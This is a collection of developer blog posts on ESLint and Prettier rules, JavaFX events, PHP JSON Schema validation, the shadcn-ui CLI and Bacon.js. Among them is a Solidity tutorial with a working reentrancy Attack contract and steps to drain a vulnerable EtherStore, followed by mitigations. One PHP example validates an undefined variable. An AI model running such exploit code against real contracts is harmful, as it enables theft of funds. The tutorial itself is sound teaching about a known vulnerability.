A ideia desse artigo foi trazer como customizar regras com objetivo de definição de padrão de projeto e antecipação de erros em React, apresentando algumas interessantes provenientes do prettier, eslint, plugin react e plugin react-hooks. Porém a quantidade de regras que podem ser customizadas é bem extensa, dado isso irei colocar os links referentes as disponíveis abaixo. Caso achem outras interessantes, se puder coloquem nos comentários para outras pessoas verem mais opções por lá.
## Links
[Prettier](https://prettier.io/docs/en/options.html)
[Eslint](https://eslint.org/docs/v8.x/rules/)
[Plugin react (regras no final do README)](https://github.com/jsx-eslint/eslint-plugin-react?tab=readme-ov-file)
[Plugin react-hooks](https://www.npmjs.com/package/eslint-plugin-react-hooks)
[Regra de hooks](https://react.dev/reference/rules/rules-of-hooks)
| griseduardo |
1,899,323 | Customizable rules for Prettier + Eslint in React | Introduction In last month's article, I presented the setup of Eslint with Prettier for a... | 0 | 2024-06-24T21:07:26 | https://dev.to/griseduardo/customizable-rules-for-prettier-eslint-in-react-17hj | react, eslint, prettier, webdev | ## Introduction
In last month's [article](https://dev.to/griseduardo/setup-eslint-prettier-for-code-standardization-in-react-112p), I presented the setup of Eslint with Prettier for a React application, focusing on using these libraries as tools for code standardization and error prevention. In this article, I will show how to customize the rules and introduce some interesting ones to consider. However, I will not suggest whether to use them or not, as this depends on the project and the decisions of the development team involved.
## Rules
Recalling the definition used in the previous article, inside the eslint configuration file `.eslintrc.json`, we set it to use the recommended rules from eslint, react, react-hooks, and to use prettier together:
```js
{
//...
"extends": [
"eslint:recommended",
"plugin:react/recommended",
"plugin:react-hooks/recommended",
"prettier"
],
"rules": {
"prettier/prettier": ["error"]
}
}
```
If the code does not comply with the rules from this configuration, an error is returned when running eslint.
## Prettier customization
To customize the rules, the `.eslintrc.json` file follows this structure:
```js
{
//...
"rules": {
"prettier/prettier": [
"error_type",
{
//...
rule: rule_expectative,
rule: rule_expectative
}
]
}
}
```
In `error_type` two types can be defined:
- warn: returns a warning if the rules are not satisfied
- error: returns an error if the rules are not satisfied
In `rule`, the rule to be customized is defined, and in `rule_expectative`, what is expected to be satisfied in the code.
## Prettier rules
| Rule | Default | Type |
| :--: | :-----: | :--: |
| singleQuote | false | boolean |
| tabWidth | 2 | number |
| printWidth | 80 | number |
| jsxSingleQuote | false | boolean |
| arrowParens | "always" | "always" or "avoid"
`singleQuote`: defines if the project will use single quotes, excluding jsx (by default, it is set to false, meaning double quotes will be used)
`tabWidth`: defines the space indentation
`printWidth`: defines the desired line length
`jsxSingleQuote`: defines if the project will use single quotes for jsx (by default, it is set to false, meaning double quotes will be used)
`arrowParens`: defines if to include parentheses for arrow functions with a single parameter (by default always included)
- "always": `(x) => x`
- "avoid": `x => x`
To demonstrate how customization is done, here's an example of a definition in `.eslintrc.json`:
```js
{
//...
"rules": {
"prettier/prettier": [
"error",
{
//...
"singleQuote": true,
"jsxSingleQuote": true,
"arrowParens": "avoid"
}
]
}
}
```
## Eslint customization
To customize the rules, the `.eslintrc.json` file follows this structure:
```js
{
//...
"rules": {
//...
rule: error_type,
rule: [error_type, rule_expectative]
}
}
```
In `error_type` three types can be defined:
- warn: returns a warning if the rule is not satisfied
- error: returns an error if the rule is not satisfied
- off: disables rule
For eslint, there are two ways to define rules. For rules where you only activate or disable them, follow this structure: `rule: error_type`. For rules that involve setting a value or something more than just activation, follow this structure: `rule: [error_type, rule_expectative]`, where `rule_expectative` defines what is expected to be satisfied in the code.
## Eslint rules
| Source | Rule | Default |
| :----: | :--: | :-----: |
| eslint | no-duplicated-imports | disabled |
| eslint | no-console | disabled |
| eslint | no-nested-ternary | disabled |
| eslint | eqeqeq | disabled |
| plugin react | react/jsx-uses-react | enabled |
| plugin react | react/react-in-jsx-scope | enabled |
| plugin react | react/jsx-no-useless-fragment | disabled |
| plugin react | react/no-array-index-key | disabled |
| plugin react | react/destructuring-assignment | disabled |
| plugin react-hooks | react-hooks/rules-of-hooks | enabled |
| plugin react-hooks | react-hooks/exhaustive-deps | enabled |
`no-duplicated-imports`: does not allow duplicate import calls from the same relative path
`no-console`: does not allow console.log()
`no-nested-ternary`: does not allow nested ternary
`eqeqeq`: defines comparison only with `===` or `!==`
`react/jsx-uses-react` e `react/react-in-jsx-scope`: defines the requirement to include `import React`, but for React 17+ applications that do not require this import, it is interesting to disable these rules
`react/jsx-no-useless-fragment`: does not allow useless fragment
`react/no-array-index-key`: does not allow array index key
`react/destructuring-assignment`: defines the use of destructuring for props, state, and context
`react-hooks/rules-of-hooks`: defines the use of rules of hooks, which includes, for example, not placing hooks inside conditionals (among others that I will add the link at the end of the article).
`react-hooks/exhaustive-deps`: defines the requirement to place all dependencies inside hooks
To demonstrate how customization is done, here's an example of a definition in `.eslintrc.json`:
```js
{
//...
"rules": {
//...
"no-console": "warn",
"eqeqeq": "error",
"react/destructuring-assignement": "error",
"react/no-array-index-key": "error",
"react-hooks/exhaustive-deps": "warn"
}
}
```
## Conclusion
The idea of this article was to show how to customize rules aimed at defining project standards and anticipating errors in React, presenting some interesting rules from prettier, eslint, react plugin and react-hooks plugin. However, the number of customizable rules is quite extensive, so I will include the links to the available ones below. If you find any other interesting rules, please feel free to share them in the comments for others to see more options there.
## Links
[Prettier](https://prettier.io/docs/en/options.html)
[Eslint](https://eslint.org/docs/v8.x/rules/)
[Plugin react (rules in the end of README)](https://github.com/jsx-eslint/eslint-plugin-react?tab=readme-ov-file)
[Plugin react-hooks](https://www.npmjs.com/package/eslint-plugin-react-hooks)
[Rules of hooks](https://react.dev/reference/rules/rules-of-hooks) | griseduardo |
1,899,359 | Exploiting Smart Contracts - Performing Reentrancy Attacks in Solidity | In this tutorial, we demonstrate how to create a reentrancy exploit in Solidity, including detailed setup, code examples, and execution steps, followed by essential mitigation strategies | 0 | 2024-06-24T20:52:53 | https://dev.to/passandscore/exploiting-smart-contracts-understanding-and-performing-reentrancy-attacks-in-solidity-40df | exploit, solidity, reentrancy | ---
title: Exploiting Smart Contracts - Performing Reentrancy Attacks in Solidity
description: In this tutorial, we demonstrate how to create a reentrancy exploit in Solidity, including detailed setup, code examples, and execution steps, followed by essential mitigation strategies
draft: false
published: true
tags:
- exploit
- solidity
- reentrancy
categories: []
slug: performing-reentrancy-attacks-in-solidity
link:
- rel: canonical
href: https://www.jasonschwarz.xyz/articles/performing-reentrancy-attacks-in-solidity
keywords: ""
---
In this tutorial, we demonstrate how to create a reentrancy exploit in Solidity, including detailed setup, code examples, and execution steps, followed by essential mitigation strategies
### Introduction
Among all attack vectors in blockchain security, reentrancy stands out as particularly significant. One of the most notable incidents involving reentrancy was the 2016 DAO hack, in which $60 million worth of Ether was stolen. This event prompted a hard fork of the Ethereum blockchain to recover the stolen funds, resulting in the creation of two distinct blockchains: Ethereum and Ethereum Classic.
In the aftermath, numerous resources and tools have been developed to prevent reentrancy vulnerabilities. Despite these efforts, modern smart contracts are still being deployed with this critical flaw. Thus, reentrancy remains a persistent threat.
For a comprehensive historical record of reentrancy attacks, refer to this [GitHub repository](https://github.com/passandscore/web3-blogs/blob/main/blog-data/7/contract.sol).
### **Reentrancy Explained**
In this tutorial, we'll simulate a reentrancy attack on the `EtherStore` contract. You can view the code [here](https://github.com/passandscore/smart-contracts/blob/main/hacks-by-example/reentrancy/reentrancy.sol). A reentrancy attack occurs when an attacker repeatedly calls a vulnerable function before the initial call completes, exploiting the contract's operation sequence to deplete its funds.


The above example illustrates the sequence of operations taken by an attacker, including the balance columns tracking the current balance of each contract after each action has been executed.
### **The Vulnerable Contract**
The `EtherStore` contract allows users to deposit and withdraw ETH but contains a reentrancy vulnerability. This vulnerability exists because the user's balance is updated **after** transferring ETH, allowing an attacker to withdraw more funds than initially deposited.
###
```solidity
/**
* @title EtherStore
* @dev A simple contract for depositing and withdrawing ETH.
* Vulnerable to reentrancy attacks.
*/
contract EtherStore {
mapping(address => uint256) public balances;
/**
* @notice Deposit Ether into the contract
*/
function deposit() public payable {
balances[msg.sender] += msg.value;
}
/**
* @notice Withdraw the sender's balance
*/
function withdraw() public {
uint256 bal = balances[msg.sender];
require(bal > 0, "Insufficient balance");
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
balances[msg.sender] = 0;
}
/**
* @notice Get the total balance of the contract
* @return The balance of the contract in wei
*/
function getBalance() public view returns (uint256) {
return address(this).balance;
}
}
```
### **How the Attack Works**
By injecting malicious code into the `EtherStore` contract's execution flow, specifically targeting the withdrawal process, an attacker can exploit the timing of the balance update. Here’s a step-by-step breakdown:
1. **Initial Withdrawal Call**: The attacker initiates a withdrawal from their balance in the `EtherStore` contract.
2. **Recursive Call Injection**: Instead of completing the withdrawal process, the attacker's contract makes a recursive call to the `withdraw` function of the `EtherStore`. This happens before the original withdrawal transaction updates the attacker's balance to zero.
3. **Repeated Withdrawals**: Each recursive call triggers another withdrawal before the balance is updated, causing the contract to send ETH repeatedly based on the initial balance.
4. **Balance Misperception**: Since the `EtherStore` contract only updates the user's balance after transferring funds, it continues to believe the attacker has a balance, thus allowing multiple withdrawals in quick succession.
5. **Exploited State**: This recursive loop continues until the contract's funds are depleted or the gas limit is reached, allowing the attacker to withdraw significantly more ETH than initially deposited.
---
## **Attack Contract Code**
The attack contract is designed to exploit the `EtherStore`'s vulnerability:
```solidity
contract Attack {
EtherStore public etherStore;
uint256 constant AMOUNT = 1 ether;
constructor(address _etherStoreAddress) {
etherStore = EtherStore(_etherStoreAddress);
}
function _triggerWithdraw() internal {
if (address(etherStore).balance >= AMOUNT) {
etherStore.withdraw();
}
}
fallback() external payable {
_triggerWithdraw();
}
receive() external payable {
_triggerWithdraw();
}
function attack() external payable {
require(msg.value >= AMOUNT, "Insufficient attack amount");
etherStore.deposit{value: AMOUNT}();
etherStore.withdraw();
}
/**
* @notice Collects Ether from the Attack contract after the exploit
*/
function collectEther() public {
payable(msg.sender).transfer(address(this).balance);
}
/**
* @notice Gets the balance of the Attack contract
* @return The balance of the contract in wei
*/
function getBalance() public view returns (uint256) {
return address(this).balance;
}
}
```
### Explanation
1. **Attack Contract Initialization**:
- The `Attack` contract is initialized with the address of the `EtherStore` contract.
- The `AMOUNT` is set to 1 ETH to ensure a consistent value used in reentrancy checks.
2. **Fallback and Receive Functions**:
- Both functions call `_triggerWithdraw`, which calls `withdraw` on the `EtherStore` if it has enough balance. This repeats the withdrawal, exploiting the reentrancy vulnerability.
3. **Attack Function**:
- The `attack` function deposits 1 ETH into the `EtherStore` and immediately calls `withdraw`, starting the reentrancy loop.
4. **Collecting Stolen Ether**:
- The `collectEther` function transfers the contract’s balance to the attacker.
---
## Try It on Remix
Deploy and interact with the contracts on [Remix IDE](https://remix.ethereum.org/) to observe how the reentrancy attack works in practice. You can use this direct link to load the code into Remix: [Load on Remix](https://remix.ethereum.org/#url=https://github.com/passandscore/web3-blogs/blob/main/blog-data/7/contract.sol&lang=en&optimize=false&runs=200&evmVersion=null&version=soljson-v0.8.26+commit.8a97fa7a.js).
**EtherStore Contract Deployment:**
1. Use a dedicated wallet and deploy the `EtherStore` contract.
2. Deposit 3 ETH using the deposit method.
3. Verify the contract balance is 3 ETH.

**Attack Contract Deployment:**
1. Use a dedicated wallet.
2. Deploy the `Attack` contract with the `EtherStore` contract address.
3. Deposit 1 ETH and run the attack method.
4. Verify that the `EtherStore` contract balance is now 0, and the `Attack` contract balance is 4 ETH.

---
<aside>
🎉 Congratulations! You’ve just successfully exploited a contract using the reentrancy attack vector.
</aside>

While that was certainly informative, it's my moral responsibility to provide you with solutions that will protect you from such potential attackers.
---
## **Mitigation Measures**
To protect smart contracts from reentrancy attacks, consider the following strategies:
1. **Update State First**: Always update the contract state before making external calls to prevent reentrant calls from exploiting outdated state information.
2. **Use Reentrancy Guards**: Implement reentrancy guards to prevent functions from being accessed repeatedly within the same transaction. The [OpenZeppelin ReentrancyGuard](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v4.9.6/contracts/security/ReentrancyGuard.sol) is a widely used and audited solution.
---
### **Protected Contract Example**
Below is an example of the `EtherStore` contract fully protected using a reentrancy guard.
```solidity
contract EtherStore is ReentrancyGuard {
mapping(address => uint256) public balances;
function withdraw() nonReentrant public {
uint256 bal = balances[msg.sender];
require(bal > 0, "Insufficient balance");
(bool sent, ) = msg.sender.call{value: bal}("");
require(sent, "Failed to send Ether");
balances[msg.sender] = 0;
}
}
```
> 🟢 Added: is ReentrancyGuard to inherit reentrancy protection.
> 🟢 Modified: withdraw function with nonReentrant to prevent reentrancy attacks.
---
### Summary
Congratulations on reaching this point! Armed with this knowledge, you now have the tools to both identify and defend against reentrancy attacks.
This tutorial has demonstrated the mechanics of a reentrancy attack by exploiting a vulnerable function in the `EtherStore` contract. It underscores the critical importance of secure coding practices, such as updating state before making external calls and implementing reentrancy guards, to effectively mitigate such vulnerabilities.
**Connect with me on social media:**
- [X](https://x.com/passandscore)
- [GitHub](https://github.com/passandscore)
- [LinkedIn](https://www.linkedin.com/in/jason-schwarz-75b91482/)
| passandscore |
1,899,358 | Mouse Events | A MouseEvent is fired whenever a mouse button is pressed, released, clicked, moved, or dragged on a... | 0 | 2024-06-24T20:50:21 | https://dev.to/paulike/mouse-events-1llj | java, programming, learning, beginners | A **MouseEvent** is fired whenever a mouse button is pressed, released, clicked, moved, or dragged on a node or a scene. The **MouseEvent** object captures the event, such as the number of clicks associated with it, the location (the _x_- and _y_-coordinates) of the mouse, or which mouse button was pressed, as shown in Figure below.

Four constants—**PRIMARY**, **SECONDARY**, **MIDDLE**, and **NONE**—are defined in **MouseButton** to indicate the left, right, middle, and none mouse buttons. You can use the **getButton()** method to detect which button is pressed. For example, **getButton() == MouseButton.SECONDARY** indicates that the right button was pressed.
The mouse events are listed in Table in [this post](https://dev.to/paulike/events-and-event-sources-4ihi). To demonstrate using mouse events, we give an example that displays a message in a pane and enables the message to be moved using a mouse. The message moves as the mouse is dragged, and it is always displayed at the mouse point. The program below gives the program. A sample run of the program is shown in Figure below.


Each node or scene can fire mouse events. The program creates a **Text** (line 13) and registers a handler to handle move dragged event (line 15). Whenever a mouse is dragged, the text’s x- and y-coordinates are set to the mouse position (lines 16 and 17). | paulike |
1,899,349 | Validating JSON with JSON Schema and PHP | JSON Schema provides a powerful way to validate the structure and content of JSON data. | 0 | 2024-06-24T20:47:23 | https://dev.to/robertobutti/validating-json-with-json-schema-and-php-2b4i | php, json, validation, tutorial | ---
title: Validating JSON with JSON Schema and PHP
description: JSON Schema provides a powerful way to validate the structure and content of JSON data.
published: true
---
JSON (JavaScript Object Notation) is a versatile and widely used format for exchanging and storing data in a structured and human-readable way.
Its simplicity and flexibility make it an ideal choice for data interchange, APIs and Web Services, configuration files, data storage, and serialization.
However, this flexibility can lead to issues if the data structure is not properly validated.
This is where JSON Schema comes into play. It provides a powerful way to validate the structure and content of JSON data.
## What is JSON Schema?
JSON Schema is a vocabulary that allows you to annotate and validate JSON documents. **JSON Schema provides a contract** for what a JSON document should look like, defining the expected structure, types, and constraints of the data.
This ensures that the data exchanged between systems adheres to a specific format, reducing the likelihood of errors and improving data integrity.
## Why Validate JSON with JSON Schema?
1. Ensuring Data Integrity: JSON Schema ensures that the JSON data received is syntactically correct and adheres to a predefined structure. This is crucial for maintaining data integrity and preventing errors from unexpected data formats.
2. Clear Documentation: JSON Schemas serve as clear and precise documentation of the expected JSON structure, making it easier for developers to understand and work with the data.
3. Enhanced Debugging: By validating JSON against a schema, you can catch errors early in the development process, making debugging easier and more efficient.
4. Improved Security: Validating JSON data helps prevent common security issues, such as injection attacks, by ensuring the data conforms to the expected format.
## JSON syntax validation in PHP
PHP provides built-in support for JSON validation through the `json_validate()` function, introduced in **PHP 8.3**.
### Validate JSON with `json_validate()`
Let's validate a JSON string using PHP's `json_validate()` method to check for syntax errors:
```php
$fruitsArray = [
[
'name' => 'Avocado',
'fruit' => '🥑',
'wikipedia' => 'https://en.wikipedia.org/wiki/Avocado',
'color' => 'green',
'rating' => 8,
],
[
'name' => 'Apple',
'fruit' => '🍎',
'wikipedia' => 'https://en.wikipedia.org/wiki/Apple',
'color' => 'red',
'rating' => 7,
],
[
'name' => 'Banana',
'fruit' => '🍌',
'wikipedia' => 'https://en.wikipedia.org/wiki/Banana',
'color' => 'yellow',
'rating' => 8.5,
],
[
'name' => 'Cherry',
'fruit' => '🍒',
'wikipedia' => 'https://en.wikipedia.org/wiki/Cherry',
'color' => 'red',
'rating' => 9,
],
];
if (json_validate($jsonString)) {
echo "Valid JSON syntax.";
} else {
echo "Invalid JSON syntax.";
}
```
### Using `json_validate()` function with older versions of PHP
The Symfony Polyfill project brings features from the latest PHP versions to older ones and offers compatibility layers for various extensions and functions. It's designed to ensure portability across different PHP versions and extensions.
Specifically, the Polyfill PHP 8.3 Component brings `json_validate()` function to PHP versions before PHP 8.3.
To install the package:
```sh
composer require symfony/polyfill-php83
```
> The Poylfill PHP 8.3 official page is: [https://symfony.com/components/Polyfill%20PHP%208.3](https://symfony.com/components/Polyfill%20PHP%208.3)
## JSON schema validation in PHP
### Syntax VS Schema validation
While this code checks if the JSON string is syntactically correct, it does not ensure the JSON data conforms to the desired structure.
However, `json_validate()` only checks if the JSON string is syntactically correct. It does not validate the structure or content of the JSON data.
To achieve comprehensive validation, you can use the `swaggest/json-schema` package, which validates JSON data against a specified schema.
Let's walk through a basic example to demonstrate the difference between `json_validate()` and validating with JSON Schema using the `swaggest/json-schema` package.
### Step 1: Install the Package
First, you need to install the `swaggest/json-schema package` via Composer:
```sh
composer require swaggest/json-schema
```
### Step 2: Define Your JSON Schema
In the example, we will create a JSON schema that defines the expected structure of your data. Let's define a schema for a simple user object, in this case, as a PHP string:
```php
$schemaJson = <<<'JSON'
{
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "array",
"items" : {
"type": "object",
"properties": {
"name": {
"type": "string"
},
"fruit": {
"type": "string"
},
"wikipedia": {
"type": "string"
},
"color": {
"type": "string"
},
"rating": {
"type": "number"
}
}
}
}
JSON;
```
### Step 3: Validate JSON with JSON Schema
To validate the structure of the JSON data, use the `swaggest/json-schema` package
```php
require 'vendor/autoload.php';
use Swaggest\JsonSchema\Schema;
try {
$schemaObject = Schema::import(
json_decode($schemaJson),
)->in(
json_decode($jsonString),
);
echo "JSON is valid according to the schema.";
} catch (\Swaggest\JsonSchema\Exception\ValidationException $e) {
echo "JSON validation error: " . $e->getMessage();
} catch (\Swaggest\JsonSchema\Exception\TypeException $e1) {
echo "JSON validation Type error: " . $e1->getMessage();
}
```
In this example, the JSON data is validated against the defined schema. An error message is displayed if the data does not conform to the schema.
## Conclusion
Validating JSON data is important to ensuring the reliability and security of your applications. While PHP's built-in `json_validate()` function is useful for checking JSON syntax, it does not provide comprehensive validation to ensure data structure integrity.
By using JSON Schema and the `swaggest/json-schema` package, you can enforce strict validation rules, catch errors early, and maintain a robust and secure application.
| robertobutti |
1,899,354 | shadcn-ui/ui codebase analysis: How does shadcn-ui CLI work? — Part 1.0 | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the... | 0 | 2024-06-24T20:44:31 | https://dev.to/ramunarasinga/shadcn-uiui-codebase-analysis-how-does-shadcn-ui-cli-work-part-10-2cj2 | javascript, nextjs, opensource, shadcnui | I wanted to find out how shadcn-ui CLI works. In this article, I discuss the code used to build the shadcn-ui/ui CLI. In part 1, we will look at a code snippet picked from [packages/cli/src/index.ts](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/index.ts).
```js
// source: https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/index.ts
#!/usr/bin/env node
import { add } from "@/src/commands/add"
import { diff } from "@/src/commands/diff"
import { init } from "@/src/commands/init"
import { Command } from "commander"
import { getPackageInfo } from "./utils/get-package-info"
process.on("SIGINT", () => process.exit(0))
process.on("SIGTERM", () => process.exit(0))
async function main() {
const packageInfo = await getPackageInfo()
const program = new Command()
.name("shadcn-ui")
.description("add components and dependencies to your project")
.version(
packageInfo.version || "1.0.0",
"-v, --version",
"display the version number"
)
program.addCommand(init).addCommand(add).addCommand(diff)
program.parse()
}
main()
```
There’s about 29 lines of code in index.ts
Imports used
------------
```js
#!/usr/bin/env node
import { add } from "@/src/commands/add"
import { diff } from "@/src/commands/diff"
import { init } from "@/src/commands/init"
import { Command } from "commander"
import { getPackageInfo } from "./utils/get-package-info"
```
[Shadcn CLI docs](https://ui.shadcn.com/docs/cli) discuss three commands; add , diff , init
These commands are imported from a folder named [commands in src folder.](https://github.com/shadcn-ui/ui/tree/main/packages/cli/src)
[Commander](https://www.npmjs.com/package/commander) is an npm package used here to enable CLI interactions.
### getPackageInfo
getPackageInfo is a small utility function found in [utils/get-package-info.ts](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/get-package-info.ts#L5)

```js
import path from "path"
import fs from "fs-extra"
import { type PackageJson } from "type-fest"
export function getPackageInfo() {
const packageJsonPath = path.join("package.json")
return fs.readJSONSync(packageJsonPath) as PackageJson
}
```
Notice how there’s an enforced PackageJson type from [type-fest](https://github.com/sindresorhus/type-fest). It is from the Legend, Sindre Sorhus. I see this guy’s name so often when I dig into open source.
[fs.readJSONSync](https://github.com/jprichardson/node-fs-extra/blob/d96f2655f181f1c6b1641711619400140a89d027/docs/readJson-sync.md) reads a JSON file and then parses it into an object. In this case, it is an object of type PackageJson.
```js
process.on("SIGINT", () => process.exit(0))
process.on("SIGTERM", () => process.exit(0))
```
**SIGINT:** This is a signal that is typically sent to a process when a user types Ctrl+C in the terminal. It is often used to request that a process terminate gracefully. When a process receives a SIGINT signal, it can catch it and perform any necessary cleanup operations before terminating.
**SIGTERM:** This is a signal that is typically sent to a process by the operating system to request that the process terminate. It is often used as a graceful way to ask a process to terminate, allowing it to perform any necessary cleanup operations before exiting. Processes can catch this signal and perform cleanup operations before terminating. ([Source](https://dev.to/superiqbal7/graceful-shutdown-in-nodejs-handling-stranger-danger-29jo))
Conclusion:
-----------
I have seen Commander.js being used in Next.js create-next-app package, I see it in use here again in shadcn-ui/ui. I will continue picking small code snippets from this CLI package and discuss the code. I liked the way package.json is read using a utility function getPackageInfo. This getPackageInfo uses fs.readJSONSync. There is Type assertion applied using PackageJson provided by type-fest on the Object returned by fs.readJSONSync.
> _Want to learn how to build shadcn-ui/ui from scratch? Check out_ [_build-from-scratch_](https://tthroo.com/)
About me:
---------
Website: [https://ramunarasinga.com/](https://ramunarasinga.com/)
Linkedin: [https://www.linkedin.com/in/ramu-narasinga-189361128/](https://www.linkedin.com/in/ramu-narasinga-189361128/)
Github: [https://github.com/Ramu-Narasinga](https://github.com/Ramu-Narasinga)
Email: [ramu.narasinga@gmail.com](mailto:ramu.narasinga@gmail.com)
References:
-----------
1. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/index.ts](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/index.ts)
2. [https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/get-package-info.ts#L5](https://github.com/shadcn-ui/ui/blob/main/packages/cli/src/utils/get-package-info.ts#L5)
3. [https://dev.to/superiqbal7/graceful-shutdown-in-nodejs-handling-stranger-danger-29jo](https://dev.to/superiqbal7/graceful-shutdown-in-nodejs-handling-stranger-danger-29jo) | ramunarasinga |
1,899,353 | Case Study: Loan Calculator | This case study develops a loan calculator using event-driven programming with GUI controls. Now, we... | 0 | 2024-06-24T20:40:09 | https://dev.to/paulike/case-study-loan-calculator-1oio | java, programming, learning, beginners | This case study develops a loan calculator using event-driven programming with GUI controls.
Now, we will write the program for the loan-calculator problem presented at the beginning of this chapter. Here are the major steps in the program:
- Create the user interface, as shown in Figure below.
a. Create a **GridPane**. Add labels, text fields, and button to the pane.
b. Set the alignment of the button to the right.
- Process the event.
Create and register the handler for processing the button-clicking action event. The handler obtains the user input on the loan amount, interest rate, and number of years, computes the monthly and total payments, and displays the values in the text fields.

The complete program is given in the program below:
```
package application;
import javafx.application.Application;
import javafx.geometry.Pos;
import javafx.geometry.HPos;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.control.Label;
import javafx.scene.control.TextField;
import javafx.scene.layout.GridPane;
import javafx.stage.Stage;
public class LoanCalculator extends Application {
private TextField tfAnnualInterestRate = new TextField();
private TextField tfNumberOfYears = new TextField();
private TextField tfLoanAmount = new TextField();
private TextField tfMonthlyPayment = new TextField();
private TextField tfTotalPayment = new TextField();
private Button btCalculate = new Button("Calculate");
@Override // Override the start method in the Application class
public void start(Stage primaryStage) {
// Create UI
GridPane gridPane = new GridPane();
gridPane.setHgap(5);
gridPane.setVgap(5);
gridPane.add(new Label("Annual Interest rate:"), 0, 0);
gridPane.add(tfAnnualInterestRate, 1, 0);
gridPane.add(new Label("Number of Years:"), 0, 1);
gridPane.add(tfNumberOfYears, 1, 1);
gridPane.add(new Label("Loan Amount:"), 0, 2);
gridPane.add(tfLoanAmount, 1, 2);
gridPane.add(new Label("Monthly Payment"), 0, 3);
gridPane.add(tfMonthlyPayment, 1, 3);
gridPane.add(new Label("Total Payment"), 0, 4);
gridPane.add(tfTotalPayment, 1, 4);
gridPane.add(btCalculate, 1, 5);
// Set properties for UI
gridPane.setAlignment(Pos.CENTER);
tfAnnualInterestRate.setAlignment(Pos.BOTTOM_RIGHT);
tfNumberOfYears.setAlignment(Pos.BOTTOM_RIGHT);
tfLoanAmount.setAlignment(Pos.BOTTOM_RIGHT);
tfMonthlyPayment.setAlignment(Pos.BOTTOM_RIGHT);
tfTotalPayment.setAlignment(Pos.BOTTOM_RIGHT);
tfMonthlyPayment.setEditable(false);
tfTotalPayment.setEditable(false);
GridPane.setHalignment(btCalculate, HPos.RIGHT);
// Process events
btCalculate.setOnAction(e -> calculateLoanPayment());
// Create a scene and place it in the stage
Scene scene = new Scene(gridPane, 400, 250);
primaryStage.setTitle("LoanCalculator"); // Set title
primaryStage.setScene(scene); // Place the scene in the stage
primaryStage.show(); // Display the stage
}
public static void main(String[] args) {
Application.launch(args);
}
private void calculateLoanPayment() {
// Get value from text fields
double interest = Double.parseDouble(tfAnnualInterestRate.getText());
int year = Integer.parseInt(tfNumberOfYears.getText());
double loanAmount = Double.parseDouble(tfLoanAmount.getText());
// Create a loan object
Loan loan = new Loan(interest, year, loanAmount);
// Display monthly payment and total payment
tfMonthlyPayment.setText(String.format("$%.2f", loan.getMonthlyPayment()));
tfTotalPayment.setText(String.format("$%.2f", loan.getTotalPayment()));
}
}
```
The user interface is created in the **start** method (lines 23–47). The button is the source of the event. A handler is created and registered with the button (line 50). The button handler invokes the **calculateLoanPayment()** method to get the interest rate (line 65), number of years (line 66), and loan amount (line 67). Invoking **tfAnnualInterestRate.getText()** returns the string text in the **tfAnnualInterestRate** text field. The **Loan** class is used for computing the loan payments. This class was introduced in [this post](https://dev.to/paulike/class-abstraction-and-encapsulation-2flo), Loan.java. Invoking **loan.getMonthlyPayment()** returns the monthly payment for the loan (line 73). The **String.format** method is used to format a number into a desirable format and returns it as a string (lines 73, 74). Invoking the **setText** method on a text field sets a string value in the text field. | paulike |
1,899,352 | Handling complex events with Bacon.js and combineTemplate | Functional Reactive Programming (FRP) is an advanced programming paradigm that simplifies the... | 0 | 2024-06-24T20:39:28 | https://dev.to/francescoagati/handling-complex-events-with-baconjs-and-combinetemplate-4cfi | javascript, baconjs, frp, stream | Functional Reactive Programming (FRP) is an advanced programming paradigm that simplifies the management and manipulation of asynchronous events, such as user input or data streams. Bacon.js is a powerful JavaScript library that enables you to implement FRP principles in your web applications effectively.
## Understanding Functional Reactive Programming (FRP)
Functional Reactive Programming is a paradigm that handles events and data streams in a more declarative manner, allowing you to describe the flow of data and reactions to it in a clear and concise way. This approach makes working with asynchronous events more manageable and intuitive, making your code easier to understand and maintain.
## Introduction to Bacon.js
Bacon.js is a lightweight library that allows you to work with events and data streams in JavaScript using the FRP paradigm. It provides a clean and readable way to create, combine, and transform streams of data, making it an excellent choice for handling asynchronous events in web applications.
## Merging vs. Combining Streams
### Merging Streams
Merging streams is the process of combining multiple streams into one single stream where events from any input streams will be emitted in the output stream. The output stream will emit events whenever any of the input streams emit an event.
#### Example
```javascript
const stream1 = Bacon.fromArray([1, 2, 3]);
const stream2 = Bacon.fromArray([4, 5, 6]);
const mergedStream = Bacon.mergeAll(stream1, stream2);
mergedStream.onValue(value => console.log(value));
```
In this example, `mergedStream` will emit the values `1, 2, 3, 4, 5, 6`.
### Combining Streams
Combining streams means creating a new stream that emits an event whenever any of the input streams emit an event. However, the emitted event in the combined stream is a combination of the latest values from all input streams.
#### Example
```javascript
const stream1 = Bacon.sequentially(1000, [1, 2, 3]);
const stream2 = Bacon.sequentially(1500, ["a", "b", "c"]);
const combinedStream = Bacon.combineAsArray(stream1, stream2);
combinedStream.onValue(values => console.log(values));
```
In this example, `combinedStream` will emit arrays containing the latest values from both `stream1` and `stream2`, like `[1, 'a'], [2, 'a'], [2, 'b'], [3, 'b'], [3, 'c']`.
## When to use `combineTemplate`
The `combineTemplate` function in Bacon.js takes the concept of combining streams to another level. It allows you to combine multiple streams into a single stream that emits structured objects containing the latest values from the input streams. This is particularly useful for forms and other UI components where you need to manage and respond to multiple user inputs.
### Example: Player Form
Let's dive into an example to understand how `combineTemplate` works. We will create a simple HTML form with two input fields for capturing a player's name and surname. Using Bacon.js, we can handle the input events in a declarative and efficient manner.
#### HTML Code
Here's the HTML code for our form:
```html
<!DOCTYPE html>
<html>
<head>
<title>Player Form</title>
<script src="https://unpkg.com/baconjs@3.0.1/dist/Bacon.js"></script>
</head>
<body>
<form>
<label for="name">Name:</label><br>
<input type="text" id="name"><br>
<label for="surname">Surname:</label><br>
<input type="text" id="surname">
</form>
</body>
</html>
```
This form contains two input fields: one for the player's name and another for their surname.
#### JavaScript Code
Now, let's add the JavaScript code to handle the input events using Bacon.js, focusing on `combineTemplate`:
```html
<script>
const nameInput = document.getElementById("name");
